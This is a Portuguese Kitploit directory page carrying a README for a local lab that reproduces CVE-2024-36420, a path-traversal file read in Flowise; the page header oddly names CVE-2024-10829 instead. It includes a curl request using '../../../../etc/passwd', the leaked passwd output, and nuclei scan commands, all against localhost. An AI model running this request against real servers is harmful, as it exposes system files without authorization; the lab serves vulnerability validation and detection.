Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC_CVE-2024-10829 — Análise do CVE-2024-10829 | Kitploit
Ferramentas/GitHubGitHub/junn34/poc_cve-2024-10829
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubjunn34/poc_cve-2024-10829

POC_CVE-2024-10829

Análise do CVE-2024-10829

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

POC_CVE-2024-36420

Laboratório de reprodução local e rascunho de template nuclei para CVE-2024-36420 afetando Flowise.

Sumário

CVE-2024-36420 é uma leitura arbitrária de arquivos no Flowise causada pelo uso não sanitizado do parâmetro fileName no corpo da requisição em:

  • POST /api/v1/openai-assistants-file

Este laboratório foi usado para validar:

  • comportamento vulnerável em flowiseai/flowise:1.4.3
  • comportamento negado na versão mais recente flowiseai/flowise:3.1.2

Referências

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
Baixar ferramenta

Arquivos

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

Teste Vulnerável

Inicie o Flowise 1.4.3:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

Verificação manual:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Resposta vulnerável observada:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

Controle de Versão Mais Recente

Inicie a versão mais recente do Flowise 3.1.2:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

Verificação manual:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Resposta da versão mais recente observada:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

Valide o template:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

Execute contra o alvo vulnerável:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

Comportamento esperado:

  • 1.4.3: correspondência
  • 3.1.2: sem correspondência

Notas

  • A diferença de versão é aceitável porque este repositório apenas afirma o comportamento observado:
    • vulnerável em 1.4.3
    • negado em 3.1.2
  • Ele não afirma o limite exato da versão corrigida.
  • Nenhum alvo real foi utilizado.